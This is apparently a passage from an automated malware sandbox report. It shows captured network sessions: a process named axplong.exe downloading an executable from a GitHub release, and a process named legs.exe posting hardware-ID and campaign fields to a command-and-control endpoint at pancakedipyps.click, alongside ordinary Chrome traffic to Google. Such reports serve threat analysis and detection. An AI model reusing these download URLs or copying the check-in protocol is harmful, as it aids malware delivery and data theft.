                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FP9dTU4z%2BfqgSmFHfpEwCVe6ZyPexAekAxtwzGXIFaAiPrQYm1VXVJYadbpQRDFWAJOf%2FEXCGXywIzXW%2FvXiv6feiGq1civ22lAIbNnASmrIFFIt1zijVgsh9%2BEdCdaHWTAr86oR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bd723e917289-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1871&rtt_var=718&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2848&recv_bytes=19077&delivery_rate=1505930&cwnd=238&unsent_bytes=0&cid=06d24ef2914379a9&ts=750&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-03 08:50:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.449848140.82.121.34432800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:15 UTC100OUTGET /legendary6911331/gold/releases/download/ggggg/gold1111111111.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: github.com
                                                                                                                                                                                                                                                  2025-01-03 08:50:15 UTC965INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:15 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                  Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/910997785/34bbe59b-8804-485f-bec3-be8f21681382?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085015Z&X-Amz-Expires=300&X-Amz-Signature=95284105c340b388ec84ffb84562274149d126ddb76b6dfe4032a6b569caa23b&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dgold1111111111.exe&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                  X-Frame-Options: deny
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                  2025-01-03 08:50:15 UTC3383INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.449861188.114.97.34436408C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=UWL7LAXZVE3FJ7Z5V
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8776
                                                                                                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC8776OUTData Raw: 2d 2d 55 57 4c 37 4c 41 58 5a 56 45 33 46 4a 37 5a 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 57 4c 37 4c 41 58 5a 56 45 33 46 4a 37 5a 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 57 4c 37 4c 41 58 5a 56 45 33 46 4a 37 5a 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 64 65 63 0d 0a 2d 2d 55
                                                                                                                                                                                                                                                  Data Ascii: --UWL7LAXZVE3FJ7Z5VContent-Disposition: form-data; name="hwid"F9C89AE3A748EEF1AC8923850305D13E--UWL7LAXZVE3FJ7Z5VContent-Disposition: form-data; name="pid"2--UWL7LAXZVE3FJ7Z5VContent-Disposition: form-data; name="lid"FATE99--dec--U
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:17 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=r1qqifql4ovgdhpsvn3npioghl; expires=Tue, 29 Apr 2025 02:36:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMXDDRutAFhRxcyunMVp4Md2kyDBjb%2BBFPMiaKFhlAvedZpOeXjY4H4NnGMfZatO3UEyOErBBYXhrAwVat03pBrF14kXO6rYg00rrQp%2FO7X%2F1k3KdUYQxTg7VdCAYDFu2Idyojqs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bd861cfd0f69-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1518&rtt_var=581&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2848&recv_bytes=9717&delivery_rate=1923583&cwnd=250&unsent_bytes=0&cid=26ff2dca17e25b20&ts=624&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.449854142.250.186.1644432024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:16 GMT
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--1b2bpIRs6YyhWe0OgeBjQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC124INData Raw: 38 62 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 66 6c 20 70 6c 61 79 6f 66 66 20 70 69 63 74 75 72 65 22 2c 22 32 30 32 35 20 68 6f 6c 69 64 61 79 73 20 63 61 6c 65 6e 64 61 72 22 2c 22 70 61 6c 61 6e 74 69 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 73 74 6f 63 6b 22 2c 22 62 6c 75 65 20 6c 6f 63 6b 20 72 6f 62 6c 6f 78 20 63 6f 64 65 73 22 2c 22 6e 69 6e 74 65 6e
                                                                                                                                                                                                                                                  Data Ascii: 8b6)]}'["",["nfl playoff picture","2025 holidays calendar","palantir technologies stock","blue lock roblox codes","ninten
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1390INData Raw: 64 6f 20 73 77 69 74 63 68 20 32 20 63 6f 6e 73 6f 6c 65 22 2c 22 61 6c 65 78 20 62 72 65 67 6d 61 6e 22 2c 22 73 6e 6f 77 20 73 74 6f 72 6d 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22 73 6f 6e 69 63 20 68 65 64 67 65 68 6f 67 20 33 20 73 74 72 65 61 6d 69 6e 67 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c
                                                                                                                                                                                                                                                  Data Ascii: do switch 2 console","alex bregman","snow storm weather forecast","sonic hedgehog 3 streaming release date"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","googl
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC723INData Raw: 67 34 55 6b 51 35 53 31 59 78 53 45 5a 4f 52 30 78 4d 4f 56 5a 71 54 6d 39 68 62 55 30 72 57 54 42 71 62 6a 42 4e 51 31 45 72 59 58 4a 52 4d 30 56 6d 53 31 4a 74 61 32 51 33 55 45 64 7a 61 45 39 68 51 55 4a 6e 55 6d 35 47 64 54 64 6a 61 32 31 76 4e 6c 5a 78 54 56 64 74 61 44 6c 4b 55 31 49 31 61 45 74 77 54 47 39 33 53 45 6c 43 64 6d 35 51 4d 6a 5a 57 54 6d 4e 4d 55 7a 4e 50 61 44 68 52 57 47 31 77 4e 6e 4a 61 4d 30 31 49 61 56 4a 35 62 55 39 4e 4d 6e 70 4e 65 6e 55 72 59 30 46 46 51 57 78 6d 5a 6d 56 79 62 54 68 32 63 6d 67 35 54 6d 52 4d 56 32 51 78 51 32 56 5a 62 32 39 42 52 47 51 34 59 6d 34 34 4d 55 4a 34 4e 6e 52 45 53 6d 56 31 62 58 4e 58 51 31 68 49 54 47 74 45 4c 30 46 4f 56 32 70 51 5a 6b 38 76 55 32 35 76 61 6b 5a 77 4d 57 46 54 61 32 5a 4f 53
                                                                                                                                                                                                                                                  Data Ascii: g4UkQ5S1YxSEZOR0xMOVZqTm9hbU0rWTBqbjBNQ1ErYXJRM0VmS1Jta2Q3UEdzaE9hQUJnUm5GdTdja21vNlZxTVdtaDlKU1I1aEtwTG93SElCdm5QMjZWTmNMUzNPaDhRWG1wNnJaM01IaVJ5bU9NMnpNenUrY0FFQWxmZmVybTh2cmg5TmRMV2QxQ2VZb29BRGQ4Ym44MUJ4NnRESmV1bXNXQ1hITGtEL0FOV2pQZk8vU25vakZwMWFTa2ZOS
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC91INData Raw: 35 35 0d 0a 79 4d 44 59 77 62 6a 52 55 4d 47 6c 6d 56 30 35 5a 61 6d 46 4f 59 31 46 77 53 30 68 73 59 79 38 32 5a 7a 6c 43 4f 57 46 78 61 7a 68 4c 5a 56 42 33 53 58 4e 31 52 48 4e 6b 4f 47 64 6d 5a 58 46 36 55 6e 52 4d 63 7a 6c 4e 64 46 5a 54 65 6d 6c 53 54 31 70 52 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 55yMDYwbjRUMGlmV05ZamFOY1FwS0hsYy82ZzlCOWFxazhLZVB3SXN1RHNkOGdmZXF6UnRMczlNdFZTemlST1pR
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC958INData Raw: 33 62 37 0d 0a 57 45 74 75 4d 55 68 49 56 32 68 6d 54 31 6b 79 62 6a 4a 31 4e 48 68 36 55 54 42 56 61 6c 52 73 61 56 4e 6c 63 48 49 34 56 6e 49 77 55 31 42 74 64 6b 39 68 62 55 74 5a 64 56 56 59 54 33 59 7a 64 48 63 31 54 44 4e 45 4e 79 73 79 59 56 64 59 52 58 70 54 62 6b 78 50 65 45 6f 72 56 46 46 68 65 57 4a 71 64 6c 63 79 55 56 5a 79 4d 6b 46 50 4d 55 4a 47 62 48 42 5a 61 33 4e 71 61 47 78 50 52 31 55 31 51 6b 68 7a 59 57 51 79 62 48 70 68 57 43 74 47 62 6c 6c 52 4d 30 6c 49 55 6e 52 6e 4d 31 6b 76 64 30 4a 56 61 32 4d 31 54 6d 46 58 4d 58 70 6a 56 32 74 32 61 56 64 72 65 6c 4a 50 56 6b 74 47 62 48 67 32 56 44 46 47 54 46 4e 53 51 6a 5a 5a 61 6d 78 4d 52 6d 55 32 5a 45 78 69 56 30 5a 30 4b 32 39 31 57 45 56 6a 54 57 5a 59 4e 6d 34 30 51 54 6c 36 55 79
                                                                                                                                                                                                                                                  Data Ascii: 3b7WEtuMUhIV2hmT1kybjJ1NHh6UTBValRsaVNlcHI4VnIwU1Btdk9hbUtZdVVYT3YzdHc1TDNENysyYVdYRXpTbkxPeEorVFFheWJqdlcyUVZyMkFPMUJGbHBZa3NqaGxPR1U1QkhzYWQybHphWCtGbllRM0lIUnRnM1kvd0JVa2M1TmFXMXpjV2t2aVdrelJPVktGbHg2VDFGTFNSQjZZamxMRmU2ZExiV0Z0K291WEVjTWZYNm40QTl6Uy
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.449858142.250.186.1644432024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.449859142.250.186.1644432024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:16 GMT
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC372INData Raw: 32 64 34 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                  Data Ascii: 2d41)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                  Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                  Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
